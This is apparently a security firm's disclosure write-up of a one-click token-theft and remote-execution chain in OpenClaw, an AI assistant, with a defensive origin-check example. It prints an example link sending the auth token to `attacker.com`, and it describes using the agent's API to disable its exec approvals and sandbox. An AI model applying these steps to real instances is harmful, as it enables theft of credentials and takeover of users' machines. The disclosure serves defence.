**1-Click RCE to Steal Your Moltbot Data and Keys: A Devastating Vulnerability in OpenClaw**

The tech world is abuzz with the news of a critical vulnerability in OpenClaw (formerly Moltbot and ClawdBot), the popular open-source AI personal assistant that has won the trust of over 100,000 developers. This powerful tool not only controls access to vital services like iMessage, WhatsApp, and Slack but also grants unrestricted local computer control. The community has been celebrating its capabilities, but a silent audit by depthfirst General Security Intelligence has uncovered a critical flaw.

**The Critical Vulnerability: A Logic Gap in the Code**

depthfirst's engine meticulously mapped the full flow of an application's lifecycle and revealed a critical logic gap that can be exploited. This vulnerability lies in the way OpenClaw processes user input, specifically the `gatewayUrl` query parameter in URLs. The code blindly accepts this parameter and persists it to storage, creating a security issue when combined with other operations.

**The Kill Chain: A Step-by-Step Guide to Exploitation**

The vulnerability can be exploited through a 1-Click Remote Code Execution (RCE) attack. Here's how:

1. **Ingestion**: The `app-settings.ts` file blindly accepts the `gatewayUrl` query parameter in the URL and persists it to storage.
2. **Processing**: The `app-lifecycle.ts` file triggers the `connectGateway()` function immediately after settings (such as the gateway URL) are applied.
3. **Protocol Execution**: The `gateway.ts` file automatically bundles the security-sensitive `authToken` into the system's connection handshake to the new gateway.

**Exploiting the Vulnerability**

To exploit this vulnerability, an attacker can create a malicious link that includes the `gatewayUrl` parameter. When a victim clicks on this link or visits a site that forwards them to the malicious link, the following sequence of events occurs:

1. **The Victim Visits the Malicious Link**: The victim clicks on a link like `http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080`.
2. **Attacker Receives the Auth Token**: The attacker's server receives the authentication token.
3. **Attacker Logs in to the Victim's OpenClaw Instance**: The attacker uses the stolen token to log in to the victim's OpenClaw instance, granting access to personal data and allowing the attacker to perform actions on behalf of the victim.

**Bypassing Localhost Network Restrictions**

However, this direct exploitation method has three limitations:

* **Same Origin Policy (SOP) Restrictions**: The Same Origin Policy prevents separate origins from fully interacting with each other.
* **WebSocket Origin Header Validation**: WebSocket servers are responsible for validating the request's origin and deciding whether to accept the connection.
* **Localhost Network Restriction**: Normally, `attacker.com` cannot make arbitrary client-side requests to `localhost`.

**Pivoting to Bypass Localhost Network Restrictions**

To overcome these limitations, I discovered a bug that allows Cross-Site WebSocket Hijacking (CSWSH). OpenClaw's WebSocket server fails to validate the WebSocket `Origin` header and accepts requests from any site. This allows me to perform CSWSH and run JavaScript in the victim's browser to open a connection to `ws://localhost:18789`.

**Arbitrary Command Execution**

With this setup in place, I can use the API to disable safety features like `exec-approvals.json` and sandbox containers. This allows me to execute arbitrary commands using the `node.invoke` request.

**The Vulnerability Has Been Fixed, But Users Must Act**

The OpenClaw team quickly addressed and fixed the issue I reported, releasing a patch that adds a gateway URL confirmation modal and removes the auto-connect-without-prompt behavior. All versions up to v2026.1.24-1 are vulnerable, so it's essential for users to upgrade their OpenClaw and rotate tokens if they suspect theirs may have leaked.
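The two checks whose absence made the chain work, written out as an added example; this is not OpenClaw's code or its patch. The function names, the allowlisted origins and the sample URLs are assumptions made for illustration.

```javascript
// Added example with hypothetical names; not OpenClaw's code or its patch.
// Assumed allowlist: the origins that legitimately serve the local control UI.
const ALLOWED_ORIGINS = new Set(["http://localhost:18789", "http://127.0.0.1:18789"]);

// Server side: accept a WebSocket upgrade only from an allowlisted Origin.
// A page on another site can reach ws://localhost, but the browser attaches
// that page's Origin to the handshake, so the request is refused here.
// This strict variant also refuses a missing or opaque ("null") Origin.
function isAllowedWsOrigin(originHeader, allowed = ALLOWED_ORIGINS) {
  if (typeof originHeader !== "string" || originHeader === "null") return false;
  try {
    // URL parsing normalizes case and default ports before the exact match.
    return allowed.has(new URL(originHeader).origin);
  } catch {
    return false; // not a parseable origin
  }
}

// Client side: a gatewayUrl in the query string is only a proposal. The saved
// gateway stays active (and is the only one that gets the auth token) until
// the user confirms the change.
function reviewGatewayParam(pageHref, savedGatewayUrl) {
  const keep = { action: "keep", gatewayUrl: savedGatewayUrl };
  const proposed = new URL(pageHref).searchParams.get("gatewayUrl");
  if (proposed === null) return keep;
  let target;
  try {
    target = new URL(proposed);
  } catch {
    return { action: "reject", gatewayUrl: savedGatewayUrl };
  }
  if (target.protocol !== "ws:" && target.protocol !== "wss:") {
    return { action: "reject", gatewayUrl: savedGatewayUrl };
  }
  if (target.href === new URL(savedGatewayUrl).href) return keep;
  return { action: "confirm", gatewayUrl: savedGatewayUrl, proposed: target.href };
}

// Constructed sample inputs.
console.log(isAllowedWsOrigin("https://attacker.example"));
console.log(reviewGatewayParam(
  "http://localhost:18789/?gatewayUrl=ws://attacker.example:8080",
  "ws://localhost:18789"));
```

Either check alone breaks one link of the chain: the confirmation gate keeps the token away from an unreviewed gateway, and the origin check stops a third-party page from driving the local WebSocket even if a token has leaked.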

**depthfirst is Building the Intelligence Layer to Catch Logic Flaws Before Attackers Do**

If you're shipping code, let's talk about how depthfirst can help build the intelligence layer to catch these logic flaws before attackers do. Stay safe!